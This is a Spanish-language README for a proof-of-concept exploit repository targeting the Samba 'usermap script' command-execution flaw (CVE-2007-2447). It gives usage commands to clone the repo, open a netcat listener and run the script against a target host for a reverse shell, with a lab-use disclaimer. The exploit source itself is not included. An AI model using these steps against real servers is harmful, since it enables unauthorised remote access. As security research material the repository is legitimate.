
Exploit de prueba de concepto para ejecución remota de comandos en el script usermap de Samba (CVE-2007-2447), con capacidad de shell inversa para pruebas de laboratorio controladas e investigación de seguridad.
PoC: Ejecución remota de comandos "usermap script" de Samba (CVE histórico). Este repositorio contiene un pequeño script de prueba de concepto para investigación y revisión educativa. El script principal es usermap_script_Command_Execution.py.
Referencia: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Clone el repositorio y ejecute el script en un laboratorio controlado. El PoC usa opcionalmente una reverse shell a LHOST:LPORT — inicie su listener antes de ejecutar el script y asegúrese de que las dependencias estén instaladas (consulte Instalación).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Parámetros
RHOST — IP o nombre de host objetivoRPORT — puerto TCP objetivo (normalmente 139)LHOST — IP del listener para una conexión reversaLPORT — puerto del listenerRecomendado: cree un entorno virtual Python aislado e instale las dependencias desde requirements.txt antes de ejecutar el script.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Este código se proporciona únicamente para fines legítimos de investigación en seguridad, educación y pruebas defensivas. No ejecute este script contra ningún sistema que no posea o para el que no tenga permiso explícito por escrito. El uso indebido puede acarrear consecuencias legales; el propietario del repositorio no se hace responsable del mal uso.
Prefiera siempre la revisión estática de código y las pruebas controladas en laboratorio (instantáneas de VM, redes aisladas y capturas de paquetes) al analizar código potencialmente peligroso.
Si desea un recorrido anotado no ejecutable o un requirements.txt, abra un issue o solicítelo aquí.